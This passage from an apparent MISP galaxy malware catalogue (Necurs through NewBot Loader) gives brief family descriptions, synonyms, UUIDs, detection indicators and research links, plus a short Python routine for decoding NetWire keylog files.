in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/ - webarchive
- https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors - webarchive
- https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/ - webarchive
- https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/ - webarchive
- https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/ - webarchive
- https://bin.re/blog/the-dgas-of-necurs/ - webarchive
- https://www.bitsight.com/blog/joint-effort-with-microsoft-to-takedown-massive-criminal-botnet-necurs - webarchive
- http://blog.talosintelligence.com/2017/03/necurs-diversifies.html - webarchive
- https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-riverview - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-riverview - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NedDnLoader
NedDnLoader is an HTTP(S) downloader that uses AES for C&C traffic encryption.
It sends detailed information about the victim's environment, like computer name, user name, type and free disk space of all drives, and a list of currently running processes. It uses three typical parameter names for HTTP POST requests: ned, gl, hl. The usual payload downloaded with NedDnLoader is Torisma.
The internal DLL name of NedDnLoader is usually Dn.dll, Dn64.dll or DnDll.dll. It is deployed either as a standalone payload or within a trojanized MFC application project. It contains specific RTTI symbols like ".?AVCWininet_Protocol@@" or ".?AVCMFC_DLLApp@@".
Internal MISP references
UUID f061ad00-c215-478e-ae31-77fcdc2f4963
which can be used as unique global reference for NedDnLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.telsy.com/lazarus-gate/ - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nefilim
According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. One difference is the removal of the RaaS component, which was replaced by email communication for payments. It uses AES-128, with the AES key then protected by RSA-2048.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nefilim.
Known Synonyms |
---|
Nephilim |
Internal MISP references
UUID 895f088e-a862-462c-a754-6593c6a471da
which can be used as unique global reference for Nefilim
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry - webarchive
- https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://securelist.com/evolution-of-jsworm-ransomware/102428/ - webarchive
- https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html - webarchive
- https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/ - webarchive
- https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/ - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/ - webarchive
- https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/ - webarchive
- https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-mansard - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot - webarchive
- https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nemesis
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nemesis.
Known Synonyms |
---|
Project Nemesis |
Internal MISP references
UUID 2f115fca-2f72-4c20-a93e-9618e51f6e2b
which can be used as unique global reference for Nemesis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nemim
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nemim.
Known Synonyms |
---|
Nemain |
Internal MISP references
UUID 5ce7906e-b1fd-4860-b3e2-ac9c72033428
which can be used as unique global reference for Nemim
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nemty
Nemty is a ransomware that was discovered in September 2019. Fortinet states that they found it being distributed in similar ways to Sodinokibi and also noted artifacts they had seen before in Gandcrab.
Internal MISP references
UUID 465696be-d576-4750-9469-89e19984f3df
which can be used as unique global reference for Nemty
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw - webarchive
- https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/ - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html - webarchive
- https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/ - webarchive
- https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/ - webarchive
- https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/ - webarchive
- https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/ - webarchive
- https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet - webarchive
- https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/ - webarchive
- https://securelist.com/evolution-of-jsworm-ransomware/102428/ - webarchive
- https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/ - webarchive
- https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-mansard - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md - webarchive
- https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b - webarchive
- https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nerbian RAT
Proofpoint observed distribution of this RAT since late April 2022; it is written in Go and incorporates code from various open-source Git repositories.
Internal MISP references
UUID 3dba4da9-7fe0-4b12-a0ed-c55065b87481
which can be used as unique global reference for Nerbian RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
neshta
Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something."
Internal MISP references
UUID 13d2482d-21fc-4044-891e-a7fb2b1660e9
which can be used as unique global reference for neshta
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta - webarchive
- https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html - webarchive
- https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest - webarchive
- https://www.virusradar.com/en/Win32_Neshta.A/description - webarchive
- https://www.mandiant.com/resources/pe-file-infecting-malware-ot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NESTEGG
NESTEGG is a memory-only backdoor that can proxy commands to other infected systems using a custom routing scheme. It accepts commands to upload and download files, list and delete files, list and terminate processes, and start processes. NESTEGG also creates Windows Firewall rules that allow the backdoor to bind to a specified port number and accept inbound traffic.
Internal MISP references
UUID fce1f9a7-bac7-4b11-8ea7-3c72931cd14a
which can be used as unique global reference for NESTEGG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf - webarchive
- https://youtu.be/_kzFNQySEMw?t=789 - webarchive
- https://youtu.be/8hJyLkLHH8Q?t=1208 - webarchive
- https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://securelist.com/lazarus-under-the-hood/77908/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetC
Internal MISP references
UUID 0bc03bfa-1439-4162-bb33-ec9f8f952ee5
which can be used as unique global reference for NetC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetDooka
A RAT written in .NET, delivered with a driver to protect it from deletion. Observed being dropped by PrivateLoader.
Internal MISP references
UUID dc6f887b-0c35-471f-9b18-2bf0a4ff357a
which can be used as unique global reference for NetDooka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NETEAGLE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NETEAGLE.
Known Synonyms |
---|
Neteagle_Scout |
ScoutEagle |
Internal MISP references
UUID 3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5
which can be used as unique global reference for NETEAGLE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle - webarchive
- https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetfilterRootkit
NetfilterRootkit is a WFP application layer enforcement callout driver which is signed by Microsoft via the Windows Hardware Compatibility program. It was first discovered by Karsten Hahn. His team submitted the malware to Microsoft, which allowed Microsoft to start an investigation.
After Karsten Hahn published tweets and an article about the rootkit, Microsoft quickly responded with their own article. Their investigation revealed Chinese gamers as targets of the malware. The rootkit redirects traffic to the threat actor's IP. The threat actor can use the driver to spoof their geo-location to cheat, but it also allows account compromise of targeted players.
While this particular rootkit is not significant anymore, similar rootkits have been created since that are also signed by Microsoft via the Windows Hardware Compatibility program.
Internal MISP references
UUID 731d992c-f2e0-4e56-a148-b8df5caee8e3
which can be used as unique global reference for NetfilterRootkit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter - webarchive
- https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html - webarchive
- https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit - webarchive
- https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/ - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf - webarchive
- https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/ - webarchive
- https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users - webarchive
- https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetFlash
Internal MISP references
UUID 88b2b4ac-9e46-4bc6-b4f6-bf5ddd70ad31
which can be used as unique global reference for NetFlash
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetKey
Internal MISP references
UUID b8ec2602-c5e5-4b49-a50e-bb3d9676abc3
which can be used as unique global reference for NetKey
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Netrepser
Internal MISP references
UUID 7c6ed154-3232-4b7a-80c3-8052ce0c7333
which can be used as unique global reference for Netrepser
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetSpy
Freely available network reconnaissance tool.
Internal MISP references
UUID a7cc22b7-0d05-480f-b7f8-a6e6c658dd8f
which can be used as unique global reference for NetSpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetSupportManager RAT
Enigma Software notes that NetSupport Manager is a genuine application, first released about twenty years ago. The purpose of the NetSupport Manager tool is to enable users to receive remote technical support or provide remote computer assistance. However, cyber criminals have hijacked this useful application and misappropriated it for use in their harmful campaigns. The modified version of NetSupport Manager has been labeled the NetSupport Manager RAT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NetSupportManager RAT.
Known Synonyms |
---|
NetSupport |
Internal MISP references
UUID 42562c47-08e1-46bc-962c-28d1831d092b
which can be used as unique global reference for NetSupportManager RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat - webarchive
- https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/ - webarchive
- https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html - webarchive
- https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2023/09/atomic-macos-stealer-delivered-via-malvertising - webarchive
- https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/ - webarchive
- https://www.youtube.com/watch?v=CIg4TXFJRK0 - webarchive
- https://embeeresearch.io/advanced-cyberchef-operations-netsupport/ - webarchive
- https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer - webarchive
- https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/ - webarchive
- https://medium.com/@ad12347/netsupport-rat-hits-again-with-new-iocs-37318de44cfc - webarchive
- https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/ - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn - webarchive
- https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/ - webarchive
- http://www.netsupportmanager.com/index.asp - webarchive
- https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/ - webarchive
- https://www.trellix.com/about/newsroom/stories/research/new-techniques-of-fake-browser-updates/ - webarchive
- https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-widely-abused-msix-app-installer-disabled-by-microsoft-active-iocs - webarchive
- https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks - webarchive
- https://medium.com/walmartglobaltech/smartapesg-4605157a5b80 - webarchive
- https://asec.ahnlab.com/en/45312/ - webarchive
- https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee - webarchive
- https://embee-research.ghost.io/advanced-cyberchef-operations-netsupport/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetTraveler
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NetTraveler.
Known Synonyms |
---|
TravNet |
Internal MISP references
UUID 3a26ee44-3224-48f3-aefb-3978c972d928
which can be used as unique global reference for NetTraveler
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests - webarchive
- https://cybergeeks.tech/dissecting-apt21-samples-using-a-step-by-step-approach/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetWire RC
NetWire is a RAT; its functionality seems focused on password stealing and keylogging, but it includes remote control capabilities as well.
Keylog files are stored on the infected machine in an obfuscated form. The algorithm is:
```python
for i in range(0, num_read):
    # subtract 0x24, XOR with 0x9D, and keep only the low byte
    buffer[i] = ((buffer[i] - 0x24) ^ 0x9D) & 0xFF
```
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NetWire RC.
Known Synonyms |
---|
NetWeird |
NetWire |
Recam |
Internal MISP references
UUID 1acd0c6c-7aff-462e-94ff-7544b1692740
which can be used as unique global reference for NetWire RC
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://news.sophos.com/en-us/2020/05/14/raticate/ - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line - webarchive
- https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg - webarchive
- https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html - webarchive
- https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers - webarchive
- https://securityintelligence.com/posts/roboski-global-recovery-automation/ - webarchive
- https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/ - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data - webarchive
- https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/ - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://lmntrix.com/lab/analysis-of-netwire-rat/ - webarchive
- https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA - webarchive
- https://threatpost.com/ta2541-apt-rats-aviation/178422/ - webarchive
- https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 - webarchive
- https://www.ciphertechsolutions.com/roboski-global-recovery-automation/ - webarchive
- https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign - webarchive
- https://community.riskiq.com/article/24759ad2 - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.circl.lu/pub/tr-23/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html - webarchive
- https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf - webarchive
- https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf - webarchive
- https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view - webarchive
- https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/ - webarchive
- https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/ - webarchive
- https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html - webarchive
- https://www.youtube.com/watch?v=TeQdZxP0RYY - webarchive
- http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html - webarchive
- https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html - webarchive
- https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/ - webarchive
- https://news.drweb.ru/show/?i=13281&c=23 - webarchive
- https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728 - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/ - webarchive
- https://www.theregister.com/2023/03/10/fbi_netwire_seizure/ - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers - webarchive
- https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0. - webarchive
- http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa - webarchive
- https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Neuron
Internal MISP references
UUID 101c2c0e-c082-4b5a-b820-2da789e839d9
which can be used as unique global reference for Neuron
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.ncsc.gov.uk/alerts/turla-group-malware - webarchive
- https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Neutrino
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Neutrino.
Known Synonyms |
---|
Kasidet |
Internal MISP references
UUID 3760920e-4d1a-40d8-9e60-508079499076
which can be used as unique global reference for Neutrino
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino - webarchive
- https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html - webarchive
- https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex - webarchive
- https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet - webarchive
- https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/ - webarchive
- http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/ - webarchive
- https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22 - webarchive
- http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html - webarchive
- http://blog.ptsecurity.com/2019/08/finding-neutrino.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Neutrino POS
Internal MISP references
UUID a954e642-4cf4-4293-a4b0-c82cf2db785d
which can be used as unique global reference for Neutrino POS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nevada
Internal MISP references
UUID abade90c-6783-4e53-a436-944733871df2
which can be used as unique global reference for Nevada
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NewBot Loader
